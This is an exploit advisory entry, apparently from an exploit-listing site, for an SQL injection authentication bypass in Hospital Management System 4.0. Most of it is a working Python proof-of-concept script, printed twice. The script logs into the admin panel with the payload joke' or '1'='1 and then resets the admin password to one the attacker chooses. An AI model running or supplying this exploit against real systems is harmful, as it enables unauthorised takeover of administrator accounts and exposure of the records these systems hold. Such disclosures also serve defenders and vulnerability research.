Hospital Management System 4.0 SQL Injection

2020.01.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Hospital Management System 4.0 - Authentication Bypass # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hospital-management-system-in-php/ # Version: v4.0 # Category: Webapps # Tested on: Xampp for Windows # Description: # Password and username parameters have sql injection vulnerability on admin panel. # username: joke' or '1'='1 , password: joke' or '1'='1 # Exploit changes password of admin user. #!/usr/bin/python import requests import sys if (len(sys.argv) !=2) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath" print "[*] e.g.: PoC.py 127.0.0.1/hospital" exit(0) rhost = sys.argv[1] npasswd = str(raw_input("Please enter at least six characters for new password: ")) url = "http://"+rhost+"/hms/admin/index.php" data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} #login with requests.Session() as session: lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False) print ("[*] Status code: %s"%check.status_code) if check.status_code == 200: print "[+] Authentication bypass was successful!" print "[+] Trying to change password." elif check.status_code == 404: print "[-] One bad day! Check target web application path." sys.exit() else: print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually." sys.exit() #change password cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""} cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"}) if cgpasswd.status_code == 200: print ("[+] Username is: admin") print ("[+] New password is: %s"%npasswd) else: print "[-] One bad day! Try it manually." sys.exit() hospital_poc.py #!/usr/bin/python import requests import sys if (len(sys.argv) !=2) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath" print "[*] e.g.: PoC.py 127.0.0.1/hospital" exit(0) rhost = sys.argv[1] npasswd = str(raw_input("Please enter at least six characters for new password: ")) url = "http://"+rhost+"/hms/admin/index.php" data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} #login with requests.Session() as session: lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False) print ("[*] Status code: %s"%check.status_code) if check.status_code == 200: print "[+] Authentication bypass was successful!" print "[+] Trying to change password." elif check.status_code == 404: print "[-] One bad day! Check target web application path." sys.exit() else: print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually." sys.exit() #change password cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""} cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"}) if cgpasswd.status_code == 200: print ("[+] Username is: admin") print ("[+] New password is: %s"%npasswd) else: print "[-] One bad day! Try it manually." sys.exit()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top